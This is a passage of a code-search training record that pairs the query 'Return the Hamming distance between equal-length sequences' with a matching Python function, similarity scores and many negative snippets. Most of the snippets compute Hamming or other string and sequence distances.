call_and_return_with_timing(f, *args, **kwargs):\n from datetime import datetime\n before = datetime.now()\n result = f(*args, **kwargs)\n after = datetime.now()\n return (result, after-before)", "def human_date(delta):\n if delta < datetime.timedelta(minutes=1):\n unit = \"{0} {1}\".format(delta.seconds, pluralize(delta.seconds, \"second,seconds\"))\n elif delta < datetime.timedelta(hours=1):\n unit = \"{0} {1}\".format(delta.seconds//60, pluralize(delta.seconds//60, \"minute,minutes\"))\n elif delta < datetime.timedelta(days=1):\n unit = \"{0} {1}\".format(delta.seconds//3600, pluralize(delta.seconds//3600, \"hour,hours\"))\n elif delta < datetime.timedelta(weeks=1):\n unit = \"{0} {1}\".format(delta.days, pluralize(delta.days, \"day,days\"))\n elif delta <= datetime.timedelta(days=30):\n unit = \"{0} {1}\".format(delta.days//7, pluralize(delta.days//7, \"week,weeks\"))\n elif delta <= datetime.timedelta(days=365):\n unit = \"{0} {1}\".format(delta.days//30, pluralize(delta.days//30, \"month,months\"))\n else:\n unit = \"{0} {1}\".format(delta.days//365, pluralize(delta.days//365, \"year,years\"))\n return unit", "def parse_delta(delta):\n match = TIMEDELTA_PATTERN.match(delta)\n if match:\n parts = {k: int(v) for k, v in match.groupdict().items() if v}\n return datetime.timedelta(**parts)", "def convert_times(value):\r\n day_patern = re.compile('\\d{4}-\\d{2}-\\d{2}')\r\n week_pattern = re.compile('\\d{4}-W\\d{2}')\r\n month_pattern = re.compile('\\d{4}-\\d{2}')\r\n year_pattern = re.compile('\\d{4}')\r\n\r\n if re.match(day_patern, value):\r\n date = datetime.strptime(value, '%Y-%m-%d')\r\n end = date + timedelta(days=1)\r\n return date, end\r\n elif re.match(week_pattern, value):\r\n date = datetime.strptime(value + '-1', '%Y-W%W-%w')\r\n end = date + timedelta(days=7)\r\n return date, end\r\n elif re.match(month_pattern, value):\r\n date = datetime.strptime(value, '%Y-%m')\r\n if date.month == 12:\r\n end = date.replace(year=date.year + 1, month=1)\r\n else:\r\n end = date.replace(month=date.month + 1)\r\n return date, end\r\n elif re.match(year_pattern, value):\r\n date = datetime.strptime(value, '%Y')\r\n end = date.replace(year=date.year + 1)\r\n return date, end\r\n else:\r\n raise ValueError('Date not recognised')" ]
[ "0.77345294", "0.6244832", "0.6088585", "0.577737", "0.5701926", "0.56636906", "0.56362903", "0.559285", "0.5573411", "0.5541884", "0.5530724", "0.55193424", "0.55110997", "0.54977155", "0.54975235", "0.54929054", "0.5488044", "0.54846984", "0.545197", "0.5361616", "0.5360478", "0.5347188", "0.5314906", "0.5292867", "0.5246696", "0.52228487", "0.52108926", "0.5202497", "0.5199447", "0.5193448", "0.5186585", "0.5180624", "0.51705235", "0.5169146", "0.51578003", "0.5141815", "0.5140469", "0.5140429", "0.5133359", "0.5117408", "0.5083325", "0.50788075", "0.5061089", "0.50581425", "0.50475854", "0.5041748", "0.5006847", "0.499926", "0.49916553", "0.4988066", "0.495869", "0.49582735", "0.49550855", "0.49400094", "0.49070317", "0.4878035", "0.48759007", "0.4867226", "0.486692", "0.48598978", "0.48543018", "0.48534366", "0.48528406", "0.48513308", "0.48489052", "0.48436254", "0.48358417", "0.48331976", "0.4831602", "0.48245403", "0.48174354", "0.4811652", "0.48056507", "0.48055497", "0.48045424", "0.48020104", "0.48015666", "0.47911635", "0.478754", "0.47820303", "0.47758812", "0.47751954", "0.47740218", "0.47726017", "0.47659057", "0.4765847", "0.47504154", "0.47359166", "0.47119966", "0.46970618", "0.46957523", "0.4690251", "0.46871582", "0.4686447", "0.46748385", "0.4671387", "0.46685392", "0.4665991", "0.46646306", "0.46592227" ]
0.7786376
0
Return the Hamming distance between equal-length sequences
def __hamming_distance(s1, s2): if len(s1) != len(s2): raise ValueError("Undefined for sequences of unequal length") return sum(el1 != el2 for el1, el2 in zip(s1, s2))
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def hamming_distance(s1, s2):\n if len(s1) != len(s2):\n raise ValueError(\"Undefined for sequences of unequal lenght.\")\n return sum(ch1 != ch2 for ch1, ch2 in zip(s1, s2))", "def hammingDistance(s1 = \"\", s2 = \"\"):\n # if len(s1) != len(s2):\n # raise ValueError(\"Undefined for sequences of unequal length\")\n return sum(bool(ord(ch1) - ord(ch2)) for ch1, ch2 in zip(s1, s2))", "def hamming_dist(self):\r\n distance = 0\r\n distance = abs(len(self.s1) - len(self.s2))\r\n distance += sum(i1 != i2 for i1,i2 in zip(self.s2,self.s1))\r\n return distance", "def hamming_distance(s1, s2):\n assert(len(s1) == len(s2))\n return np.sum([1 if c1 != c2 else 0 for c1, c2 in zip(s1, s2)])", "def hamming_dist(seq1, seq2):\n diffs = 0\n length = 0\n for x, y in zip(str(seq1), str(seq2)):\n if x == '-' or y == '-':\n continue\n elif x != y:\n diffs += 1\n length += 1\n try:\n return float(diffs) / length\n except:\n return 0.5", "def hamming_distance(s1, s2):\n return sum(c1 != c2 for c1, c2 in zip(s1, s2))", "def hamming_distance(a, b):\n return np.count_nonzero(a != b)", "def hamming_distance(s1, s2):\n if len(s1) > len(s2):\n s2 = s2.ljust(len(s1))\n else:\n s1 = s1.ljust(len(s2))\n\n return sum(el1 != el2 for el1, el2 in zip(s1, s2))", "def hamming_distance(input1, input2):\n if len(input1) != len(input2):\n raise ValueError('Length of input1 and input2 are not equal.')\n input1 = hex_decode(hex_encode(input1))\n input2 = hex_decode(hex_encode(input2))\n # the general strategy here is to xor the two strings together\n # and then just count the number of 1s in the output (i.e., where the\n # two strings differed).\n output = fixed_xor(input1, input2)\n distance = 0\n for byte in output:\n for i in range(8):\n bit_mask = 1 << i\n if (bit_mask & byte) == bit_mask:\n distance += 1\n return distance", "def hamming_distance(cs):\n d = 0.0\n end = len(cs) - 1\n for idx in range(end):\n s1 = cs[idx]\n s2 = cs[idx + 1]\n assert len(s1) == len(s2)\n s1_bits = ''.join('{:b}'.format(c).zfill(8) for c in s1)\n s2_bits = ''.join('{:b}'.format(c).zfill(8) for c in s2)\n d += sum(c1 != c2 for c1, c2 in zip(s1_bits, s2_bits))\n return d / end", "def hamming_distance(s1, s2):\n assert len(s1)==len(s2), \",\".join((s1, s2))\n s1 = np.array(s1.upper(), dtype=\"c\")\n s2 = np.array(s2.upper(), dtype=\"c\")\n return np.sum(s1 != s2)", "def hamming_distance(x1: np.ndarray, x2: np.ndarray) -> int:\n assert isinstance(x1, np.ndarray) and isinstance(x2, np.ndarray)\n return (x1 != x2).sum()", "def hamming_distance(p, q):\n result = 0\n for x, y in zip(p, q):\n if x != y:\n result += 1\n return result + abs(len(p) - len(q))", "def compute_hamming_distance(str1, str2):\n\n mismatches = 0\n len_strs = len(str1)\n for i in range(len_strs):\n if str1[i] != str2[i]:\n mismatches = mismatches + 1\n return mismatches", "def hamming_distance(h1, h2):\n b1 = bitarray.bitarray()\n b1.frombytes(h1)\n b2 = bitarray.bitarray()\n b2.frombytes(h2)\n return bitarray.bitdiff(b1, b2)", "def hamming_distance(lhs,rhs):\n return len([(x,y) for x,y in zip(lhs,rhs) if x !=y])", "def hamming_dist(bytes1, bytes2):\n if type(bytes1) == str:\n bytes1 = [ord(c) for c in str1]\n if type(bytes2) == str:\n bytes2 = [ord(c) for c in str2]\n bins = [bin(o1 ^ o2) for o1, o2 in zip(bytes1, bytes2)]\n return len([i for i in ''.join(bins) if i == '1'])", "def HammingDistance(pattern1, pattern2):\n distance = 0\n if len(pattern1) == len(pattern2):\n for i in range(len(pattern1)):\n if pattern1[i]!=pattern2[i]:\n distance += 1\n return distance\n else:\n 
assert 0, \"Two patterns have different lengths.\"", "def hamming_dist(a_b, b_b):\n return sum(bin(a_b[n] ^ b_b[n]).count('1') for n in range(len(a_b)))", "def hamming_distance(str1, str2):\n\n # TODO: Write your solution here\n # Edge case check\n if len(str1) != len(str2):\n return None\n\n count = 0\n for index in range(len(str1)):\n if str1[index] != str2[index]:\n count += 1\n\n if count is 0:\n return None\n\n return count", "def hamming_distance(a, b):\n assert len(a) == len(b)\n dist = sum(item_a != item_b for item_a, item_b in zip(a, b))\n return dist", "def generalised_hamming_distance(a, b):\n if len(a) == len(b):\n return hamming_distance(a, b)\n if len(a) > len(b):\n dna = a\n kmer = b\n else:\n dna = b\n kmer = a\n k = len(kmer)\n\n dist = min([hamming_distance(kmer, kmer2) for kmer2 in kmers_from_dna(dna, k)])\n return dist", "def hamming_dist(s1, s2):\n\n if s1 is None or s2 is None:\n return np.NaN\n if pd.isnull(s1) or pd.isnull(s2):\n return np.NaN\n\n # Create the similarity measure object\n measure = sm.HammingDistance()\n\n s1 = gh.convert_to_str_unicode(s1)\n s2 = gh.convert_to_str_unicode(s2)\n\n\n # Call the function to compute the distance\n return measure.get_raw_score(s1, s2)", "def hamming_distance(bytes_0: bytes, bytes_1: bytes) -> int:\n assert len(bytes_0) == len(bytes_1)\n return sum(sum(bits(byte_0 ^ byte_1)) for (byte_0, byte_1) in zip(bytes_0, bytes_1))", "def hamming_distance(StringA,StringB):\n if len(StringA) != String(B):\n raise ValueError(\"The length of sequences are not equal!\")\n return sum(x !=y for (x,y) in zip(StringA,StringB))", "def hamming_dist(gene_1, gene_2):\n ham_dist = 0\n for c1, c2 in zip(gene_1, gene_2):\n if c1 != c2:\n ham_dist += 1\n return ham_dist", "def hamming_distance(string_a: str, string_b: str) -> int:\n if len(string_a) != len(string_b):\n raise ValueError(\n \"Strings are of unequal length can not compute hamming distance. 
Hamming distance is undefined.\"\n )\n return sum(char_1 != char_2 for char_1, char_2 in zip(string_a, string_b))", "def hammingDist(x, y):\n hd = 0\n for ch1, ch2 in zip(x, y):\n if ch1 != ch2:\n hd += 1\n return hd", "def HammingDist(str1, str2):\n\tHdist = 0\n\tfor i, base in enumerate(str1):\n\t\tif base != str2[i]:\n\t\t\tHdist += 1\n\n\treturn Hdist", "def hamming(a, b):\n len1 = len(a)\n len2 = len(b)\n overlap = min(len1, len2)\n difference = abs(len1 - len2)\n for x in range(overlap):\n if a[x] != b[x]:\n difference += 1\n\n return difference", "def HammingDistance(p, q):\r\n if len(p) != len(q):\r\n return -1\r\n dist = 0\r\n #zip(AB,CD) gives (('A','C'),('B','D'))\r\n for first, second in zip(p, q):\r\n if first != second:\r\n dist = dist + 1\r\n return dist", "def hamming(string1, string2):\n\n strlen1 = len(string1)\n strlen2 = len(string2)\n\n if strlen2 < strlen1:\n strlength = strlen2\n else:\n strlength = strlen1\n\n hamcount = 0\n for i in range(strlength):\n if string1[i] != string2[i]:\n hamcount += 1\n\n return(hamcount)", "def countingPointMutations(seq1, seq2):\n seqLength = len(list(seq1))\n \n hammingDistance=0;\n for i in range(0,seqLength):\n if list(seq1)[i]!=list(seq2)[i]:\n hammingDistance = hammingDistance+1;\n return hammingDistance", "def distance(base_strand, comparison_strand):\n hamming_distance = 0\n\n for nucleotide in range(len(base_strand)):\n if base_strand[nucleotide] != comparison_strand[nucleotide]:\n hamming_distance += 1\n \n return hamming_distance", "def hamming_distance(string1: str, string2: str) -> int:\n if len(string1) != len(string2):\n raise ValueError(\"String lengths must match!\")\n\n count = 0\n\n for char1, char2 in zip(string1, string2):\n if char1 != char2:\n count += 1\n\n return count", "def hamming_distance(s1, s2, hamming_distance = 3):\n\ts1 = str(s1)\n\ts2 = str(s1)\n\n\tif len(s1) != len(s2):\n\t\ts1 = replenish_int(s1, 6)\n\t\ts2 = replenish_int(s2, 6)\n\tdis = sum(ch1 != ch2 for ch1, ch2 in zip(s1, s2))\n\n\tif dis <= hamming_distance:\n\t\t'表示海明距离在 3 以内'\n\t\treturn True\n\telse:\n\t\treturn False", "def hamming_dist(v1, v2):\r\n edits = (v1 != v2)\r\n return edits.sum()", "def hamming(seq1, seq2) -> int:\n if type(seq1) is SeqRecord:\n return hamming(seq1.seq, seq2)\n elif type(seq2) is SeqRecord:\n return hamming(seq1, seq2.seq)\n elif (type(seq1) is str or type(seq1) is Seq) and (type(seq2) is Seq or type(seq2) is str):\n if len(seq1) != len(seq2):\n raise ValueError('The sequences are of different lengths!')\n else:\n distance = 0\n for i in range(len(seq1)):\n if seq1[i] != seq2[i]:\n distance += 1\n return distance\n else:\n raise TypeError('Wrong type.')", "def hamdist(inp):\n\treturn sum(c1 != c2 for c1, c2 in itertools.izip(inp[0],inp[1]))", "def hamming(s1, s2):\n weight = abs(len(s1)-len(s2))\n if len(s1) < len(s2):\n s1, s2 = s2, s1\n for i in range(len(s2)):\n weight += not s1[i] == s2[i]\n return weight", "def get_hamming_distance(self, calc_bits):\n\n # Iterate through calculated bits and compare to received bits.\n # Store number of different bits in total_distance.\n total_distance = 0\n for idx, bit in enumerate(calc_bits):\n diff = abs(bit - self.received_bits[idx])\n total_distance += diff\n\n return total_distance", "def hamming(strand1, strand2):\r\n strand1_len = len(strand1)\r\n strand2_len = len(strand2)\r\n\r\n count = abs(strand1_len - strand2_len)\r\n\r\n for i in range(min((strand1_len, strand2_len))):\r\n if strand1[i] != strand2[i]:\r\n count += 1\r\n\r\n return count", "def 
HammingDistance(array1, array2, normed=False):\n # 0) PREPARE FOR CALCULATIONS\n # 0.1) Convert the arrays into rank-1 arrays\n if len(np.shape(array1)) > 1:\n array1 = array1.reshape(-1)\n if len(np.shape(array2)) > 1:\n array2 = array2.reshape(-1)\n\n # 0.2) Security check\n if len(array1) != len(array2):\n raise ValueError( \"Arrays are not aligned\" )\n\n # 1) COUNT THE NUMBER OF COINCIDENCES\n similarity = (array1 == array2)\n n_equal = similarity.sum()\n\n # 2) COMPUTE THE HAMMING DISTANCE\n length = len(array1)\n h_dist = 1. - float(n_equal) / length\n\n # 3) RETURN RESULT ACCORDING TO OPTIONS\n # Standard Hamming distance\n if not normed:\n return h_dist\n\n # Normalized Hamming distance\n else:\n # Count the number of ones in the two arrays\n n_1 = len(array1.nonzero()[0])\n n_2 = len(array2.nonzero()[0])\n\n # Estimate the expected number of random coincidences\n exp_nc = 1.0 / length * (n_1 * n_2 + (length - n_1) * (length - n_2))\n\n # The expected Hamming distance\n exp_hdist = 1.0 - exp_nc / float(length)\n\n return h_dist, exp_hdist", "def hamming(s1, s2):\n s1 = str(s1)\n s2 = str(s2)\n if len(s1) != len(s2):\n raise ValueError(\"Undefined for sequences of unequal length.\")\n return sum(el1 != el2 for el1, el2 in zip(s1, s2))", "def lcs_hamming_only_matches(s1: str, s2: str, k: int, length: int, matches_lst: List):\n count = 0\n for i in range(0, len(s1) - length + 1):\n for j in range(0, len(s2) - length + 1):\n sub1 = s1[i: i + length]\n sub2 = s2[j: j + length]\n result = hamming_distance(sub1, sub2)\n if result <= k:\n matches_lst.append([i, j, result, sub1, sub2])\n count += 1\n # print(\"total matches: \" + str(count))\n return count", "def hamming(s1, s2):\n assert len(s1) == len(s2)\n return sum(c1 != c2 for c1, c2 in zip(s1, s2))", "def hamming_sim(s1, s2):\n\n if s1 is None or s2 is None:\n return np.NaN\n if pd.isnull(s1) or pd.isnull(s2):\n return np.NaN\n\n # Create the similarity measure object\n measure = sm.HammingDistance()\n\n s1 = gh.convert_to_str_unicode(s1)\n s2 = gh.convert_to_str_unicode(s2)\n\n # Call the function to compute the similarity score.\n return measure.get_sim_score(s1, s2)", "def get_distance_hamming(self, vec):\r\n\r\n sum = 0\r\n if len(self.weights) == len(vec):\r\n return self.hamming(self.weights, vec)\r\n else:\r\n sys.exit(\"Error: dimension of nodes != input data dimension!\")", "def hamming_byte(bin1, bin2):\n\n diffs = 0\n xored = xor(bin1, bin2)\n for byte in xored:\n diffs += bin(byte).count(\"1\")\n return diffs", "def hamdist(str1, str2):\n\n diffs = 0\n for ch1, ch2 in zip(str1, str2):\n if ch1 != ch2:\n diffs += 1\n return diffs", "def hamming_str(s1, s2):\n\n diffs = 0\n bin1 = bin(int(s1.encode('hex'), 16))\n bin2 = bin(int(s2.encode('hex'), 16))\n\n # for bit1, bit2 in zip(bin1, bin2):\n for bit1, bit2 in map(None, bin1, bin2):\n if bit1 != bit2:\n diffs += 1\n return diffs", "def manhatam_distance(self) -> int:\n raise NotImplementedError", "def hamming2(s1, s2):\n assert len(s1) == len(s2)\n return sum(c1 != c2 for c1, c2 in zip(s1, s2))", "def hamming_distance(words: Iterator[str], vocabulary: Dict[str, int]):\n\n for word in words:\n distances = []\n suggestions = []\n vocab_list = list(vocabulary)\n for (i,vocab) in enumerate(vocab_list):\n if len(vocab) == len(word):\n distances.append(hamming(word, vocab))\n else:\n distances.append(120)\n \n idx = np.array(distances).argsort()[:5]\n \n for i in range(5):\n for j in range(i+1,5):\n if distances[idx[i]] == distances[idx[j]]:\n if 
vocabulary.get(vocab_list[idx[i]]) < vocabulary.get(vocab_list[idx[j]]):\n temp = idx[i] \n idx[i] = idx[j]\n idx[j] = temp \n\n for i in idx:\n suggestions.append(vocab_list[i])\n\n output(\"{misspelled}\\t{corrections}\".format(\n misspelled=word,\n corrections=\"\\t\".join(suggestions)\n )) # may cause IO bottleneck", "def chk_hamming(data):\n pass", "def distance(self, x, y):\n\n return distance.hamming(x, y)", "def hamming_distance(v_est, v_true):\n assert(v_est.shape == v_true.shape)\n\n return 1 / len(v_est) * np.sum(v_est != v_true)", "def ham_dist(p, q):\n count = 0\n for i in range(len(p)):\n if p[i] != q[i]:\n count += 1\n return count", "def ham_dist(p, q):\n count = 0\n for i in range(len(p)):\n if p[i] != q[i]:\n count += 1\n return count", "def distance(dna_1, dna_2):\n hamming_difference = 0\n\n # turn the strings into a list of characters\n a = list(dna_1)\n b = list(dna_2)\n\n # iterate through both lists and compares. If they are not the same increment the hamming_difference\n for nucleotide_1, nucleotide_2 in map(None, dna_1, dna_2):\n if nucleotide_1 != nucleotide_2:\n hamming_difference += 1\n\n return hamming_difference", "def minHamm(text,pattern):\r\n D=kmersfrequency(text,len(pattern))\r\n return (min([(HammingDistance(pattern,x)) for x in D.keys()]))", "def hamming(text1, text2):\n assert (len(text1) == len(text2))\n return sum(a != b for a, b in zip(text1, text2))", "def structural_hamming_distance(self,\n other,\n penalty_edge_mismatch_func=None):\n\n edges_1 = self.edges\n edges_2 = other.edges\n if penalty_edge_mismatch_func is None:\n penalty_edge_mismatch_func = GraphViaEdges.compute_penalty\n\n if set(edges_1.keys()) != set(edges_2.keys()):\n msg = 'The Structural Hamming Distances cannot be computed : the '\n msg += 'graphs cannot be compared.'\n raise GraphsCannotBeCompared(msg)\n\n shd = 0\n\n for key in edges_1.keys():\n\n shd += penalty_edge_mismatch_func(\n edge_1=edges_1[key],\n edge_2=edges_2[key]\n )\n\n return shd", "def nb_vector_hamming_distance(indices, seqs_mat, seqs_L, check_lengths=True):\n return _nb_vector_hamming_distance(indices, seqs_mat, seqs_L, check_lengths)", "def __h2(self): # _manhattan_distance\n h2 = 0\n\n for i in range(self.board_size):\n for j in range(self.board_size):\n if self.arr[i][j] == 0:\n continue\n h2 += (abs(i-(self.arr[i][j]//self.board_size)) +\n abs(j-(self.arr[i][j] % self.board_size)))\n\n return h2", "def hamming_algorithm(data: bytearray):\n print(f\"data: {data}\")\n # 12345678 12345678 12345678 12345678\n if len(data) % 4 != 0:\n diff = 4 - len(data) % 4\n data += bytes(diff)\n m = len(data)\n r = 0\n chunck = 0\n i = 0\n ret_data = bytearray()\n while i < m // 4:\n chunck = struct.unpack(\"I\", data[i*4:i*4 + 4])[0]\n chunck, chunck_str = insert_redundant_bits(chunck)\n print(f\"chunck: {chunck} chunck_str:{chunck_str}\")\n i += 1", "def Hamming(data):\r\n N=float(data.shape[0])\r\n temp=np.zeros(data.shape[0])\r\n for u, i in enumerate(data):\r\n temp[u]=(0.54-0.46*np.cos(2*np.pi*(u/N)))*i\r\n return temp", "def manhatam_distance(self) -> int:\n return abs(self.position[0]) + abs(self.position[1])", "def distance_between_hex_cells(cell1, cell2):\n return even_q_distance(*(cell1 + cell2))", "def distance(self, record):\n return hamming_dist(self.centroid.seq, record.seq)", "def kmer_distance(seq1,seq2,k=3):\n seq1_set = set(count_kmers(seq1,k).keys())\n seq2_set = set(count_kmers(seq2,k).keys())\n union_seq = seq1_set.union(seq2_set)\n dissimilarity = seq1_set ^ seq2_set\n distance = 
len(dissimilarity)/len(union_seq)\n print(dissimilarity)\n return distance", "def _pairwise_dist(self,seq1,seq2):\n \n return jf.damerau_levenshtein_distance(str(seq1), str(seq2))", "def calculate_weighted_hash(cls, word):\n\n hash_value = 0\n for char in word:\n hash_value += cls.alpha_lookup[char.lower()]\n return hash_value", "def _reduce(self, hash):\n summation = 0\n for char in hash:\n summation += ord(char)\n return summation % self._size", "def min_ham_dist(pattern, dna):\n dist = 0\n candidates = []\n for seq in dna:\n a, b = min_ham_dist_helper(pattern, seq)\n dist += a\n candidates.append(b)\n return dist, candidates", "def text_similarity(this_text, other_text, shingle_length=5, minhash_size=200, random_seed=5):\n this_shingles = ShingledText(this_text, random_seed=random_seed, shingle_length=shingle_length, minhash_size=minhash_size)\n other_shingles = ShingledText(other_text, random_seed=random_seed, shingle_length=shingle_length, minhash_size=minhash_size)\n return this_shingles.similarity(other_shingles)", "def jaccard_distance(sentence_a, sentence_b):\n set_a = set(sentence_a.split())\n set_b = set(sentence_b.split())\n distance = (len(set_a.union(set_b)) - len(set_a.intersection(set_b))) / len(set_a.union(set_b))\n return distance", "def _calc_distance(hmm1, hmm2, seqs2):\n p12 = hmm1.calc_loglikelihood(seqs2)\n p22 = hmm2.calc_loglikelihood(seqs2)\n # calc total number of elements in all sequences\n # TODO: consider the case when number of elements vary from seq to seq\n n_elements = len(seqs2) * len(seqs2[0])\n return (p22 - p12) / n_elements", "def _PD_hamming(alignA, alignB, subst, bySite, withinA, ignoreGaps=True):\n L = len(alignA.iloc[0])\n gapCode = AA2CODE['-']\n\n \"\"\"Convert alignments into integer arrays first to speed comparisons\"\"\"\n matA = np.zeros((len(alignA), L))\n for seqi, s in enumerate(alignA):\n matA[seqi,:] = _seq2vec(s)\n if not withinA:\n matB = np.zeros((len(alignB), L))\n for seqi, s in enumerate(alignB):\n matB[seqi,:] = _seq2vec(s)\n\n \"\"\"Dist will be 1 where equal, 0 where not and nan if one is a gap\"\"\"\n if withinA:\n dist=np.zeros((int(scipy.special.comb(len(alignA), 2)), L))\n allPairs = itertools.combinations(np.arange(len(alignA)), 2)\n for j, (seqi1, seqi2) in enumerate(allPairs):\n dist[j,:] = matA[seqi1,:]!=matA[seqi2,:]\n if ignoreGaps:\n gapInd = (matA[seqi1,:]==gapCode) | (matA[seqi2,:]==gapCode)\n dist[j, gapInd] = np.nan\n else:\n dist=np.zeros((len(alignA)*len(alignB), L))\n allPairs = itertools.product(np.arange(len(alignA)), np.arange(len(alignB)))\n for j, (seqiA, seqiB) in enumerate(allPairs):\n dist[j,:] = matA[seqiA,:]!=matB[seqiB,:]\n if ignoreGaps:\n gapInd = (matA[seqiA,:]==gapCode) | (matB[seqiB,:]==gapCode)\n dist[j, gapInd] = np.nan\n\n if not bySite:\n dist=np.nanmean(dist, axis=1)\n return np.nanmean(dist, axis=0)", "def lcs_hamming_only_matches_with_many_k(s1: str, s2: str, ks: List[int], length: int, matches_lst: List, query_name, target_name):\n file_name = './chromo_matches_' + str(length) + '.txt'\n f = open(file_name, mode='a')\n count = [0, 0, 0]\n for i in range(0, len(s1) - length + 1):\n for j in range(0, len(s2) - length + 1):\n sub1 = s1[i: i + length]\n sub2 = s2[j: j + length]\n result = hamming_distance(sub1, sub2)\n if result <= 0:\n # matches_lst.append([query_name, target_name, i, j, result, sub1, sub2])\n f.write(query_name + ',' + target_name + ',' + str(i) + ',' + str(j) + ',' + str(k)+ ',' + str(sub1) + ',' + sub2 + '\\n')\n count[0] += 1\n if result <= 1:\n f.write(query_name + 
',' + target_name + ',' + str(i) + ',' + str(j) + ',' + str(k)+ ',' + str(sub1) + ',' + sub2 + '\\n')\n count[1] += 1\n if result <= 2:\n f.write(query_name + ',' + target_name + ',' + str(i) + ',' + str(j) + ',' + str(k)+ ',' + str(sub1) + ',' + sub2 + '\\n')\n count[2] += 1\n\n # print(\"total matches: \" + str(count))\n f.close()\n return count", "def hamming(x, y):\n\n # The implem is 'symbolic', meaning that vectors can be coded not with just\n # zeros and ones, but with anything at all.\n # hamming([0, 1], [0, 1]) = 0 + 0\n # hamming([0, 1], [0, 2]) = 0 + 1\n # hamming([0, 1], [0, 5]) = 0 + 1\n # This is usefull for the monk2 dataset for ex., where some binary features\n # are coded as '1' or '2'.\n return sum(xi != yi for (xi,yi) in zip(x, y))", "def calc_symmetric_distance(hmm1, hmm2, T, K=1, seed=None):\n seqs1, _ = hmm1.generate_sequences(K, T, seed=seed)\n seqs2, _ = hmm2.generate_sequences(K, T, seed=seed)\n return np.abs(_calc_distance(hmm1, hmm2, seqs2) +\n _calc_distance(hmm2, hmm1, seqs1)) / 2", "def cycleLength(ch,distance):\n countryNo=len(ch)\n total = 0.\n for c in range(countryNo):\n total += distance[ch[c]][ch[(c+1)%countryNo]]\n return total", "def face_distance(face_encodings, face_to_compare):\n import numpy as np\n if len(face_encodings) == 0:\n print('encoding 等于零')\n return np.empty((0))\n distance = np.linalg.norm(face_encodings - face_to_compare)\n return distance", "def distance_modulus(d):\n dmag = 5 * log(d) - 5\n return dmag", "def length_dist(self,synset_1, synset_2):\n\t l_dist = sys.maxsize\n\t if synset_1 is None or synset_2 is None: \n\t return 0.0\n\t if synset_1 == synset_2:\n\t # if synset_1 and synset_2 are the same synset return 0\n\t l_dist = 0.0\n\t else:\n\t wset_1 = set([str(x.name()) for x in synset_1.lemmas()]) \n\t wset_2 = set([str(x.name()) for x in synset_2.lemmas()])\n\t if len(wset_1.intersection(wset_2)) > 0:\n\t # if synset_1 != synset_2 but there is word overlap, return 1.0\n\t l_dist = 1.0\n\t else:\n\t # just compute the shortest path between the two\n\t l_dist = synset_1.shortest_path_distance(synset_2)\n\t if l_dist is None:\n\t l_dist = 0.0\n\t # normalize path length to the range [0,1]\n\t return math.exp(-self.ALPHA * l_dist)", "def manhatam_distance(self) -> int:\n return abs(self.north) + abs(self.east)", "def distance(a, b):\n a = a[0]\n b = b[0]\n if lower.search(a):\n if lower.search(b):\n return abs(ord(b) - ord(a)) % 8\n elif upper.search(b):\n return abs(ord(b.lower()) - ord(a)) % 5 + 8\n elif upper.search(a):\n if lower.search(b):\n return abs(ord(a.lower()) - ord(b)) % 5 + 8\n elif upper.search(b):\n return abs(ord(b) - ord(a)) % 8\n if a == b:\n return 0\n return 1", "def mm_similarity(s1, s2):\n if filter(str.isalpha, s1) == filter(str.isalpha, s2):\n if len(s1) < len(s2):\n return float(len(s1)) / len(s2)\n else:\n return float(len(s2)) / len(s1)\n else:\n return 0.", "def distance(self, word_a, word_b):\n word_a, word_b = word_a.upper(), word_b.upper()\n s_a = self.word_lookup[word_a]\n s_b = self.word_lookup[word_b]\n j = 1\n max_len = min(len(s_a), len(s_b))\n while j <= max_len:\n if s_a[-j] != s_b[-j]:\n break\n j += 1\n return j", "def hex_distance(a, b):\n return (abs(a[0] - b[0]) + abs(a[1] - b[1]) +\n abs((-a[0] - a[1]) - (-b[0] - b[1]))) / 2", "def distance_between_pattern_and_strings(pattern, dna):\n\n k = len(pattern)\n distance = 0\n\n for text in dna:\n hamming_distance = 1000000\n for i in range(len(text) - k + 1):\n if hamming_distance > compute_hamming_distance(pattern, text[i:i + k]):\n 
hamming_distance = compute_hamming_distance(pattern, text[i:i + k])\n distance = distance + hamming_distance\n return distance", "def calc_length(self):\n return AtomMath.length(self.atom1.position - self.atom2.position)", "def word_rotator_similarity(x, y):\n return 1 - word_rotator_distance(x, y)", "def homophily(G, chars, IDs):\n num_same_ties = 0\n num_ties = 0\n for n1, n2 in G.edges():\n if IDs[n1] in chars and IDs[n2] in chars:\n if G.has_edge(n1, n2):\n num_ties += 1\n if chars[IDs[n1]] == chars[IDs[n2]]:\n num_same_ties += 1\n return (num_same_ties / num_ties)", "def qwerty_distance():\n from collections import defaultdict\n import math\n R = defaultdict(dict)\n R['-']['-'] = 0\n zones = [\"dfghjk\", \"ertyuislcvbnm\", \"qwazxpo\"]\n keyboard = [\"qwertyuiop\", \"asdfghjkl\", \"zxcvbnm\"]\n for num, content in enumerate(zones):\n for char in content:\n R['-'][char] = num + 1\n R[char]['-'] = 3 - num\n for a in ascii_lowercase:\n rowA = None\n posA = None\n for num, content in enumerate(keyboard):\n if a in content:\n rowA = num\n posA = content.index(a)\n for b in ascii_lowercase:\n for rowB, contentB in enumerate(keyboard):\n if b in contentB:\n R[a][b] = int(math.fabs(rowB - rowA) + math.fabs(posA - contentB.index(b)))\n return R", "def hamming_weight(num):\n\n return bin(num).count(\"1\");", "def euclidean_distance(s1,s2): \n tmpsum = 0\n \n for index,value in enumerate(s1):\n tmpsum += (s1[index]-s2[index])**2\n \n return math.sqrt(tmpsum)", "def min_ham_dist_helper(pattern, seq):\n k = len(pattern)\n dist = math.inf\n candidates = set()\n for i in range(len(seq)-k+1):\n compare = seq[i:i+k]\n ham = ham_dist(pattern, compare)\n if ham < dist:\n dist = ham\n candidates = set([compare])\n elif ham == dist:\n candidates.add(compare)\n return dist, list(candidates)", "def parity_of_very_long(x, word_size=8):\n res = 0\n hash_map = {}\n while x!=0:\n word = x & ( (1<<word_size)-1)\n if not(word in hash_map):\n hash_map[word] = parityOf(word)\n res ^= hash_map[word]\n x >>= word_size\n print(hash_map)\n return res" ]
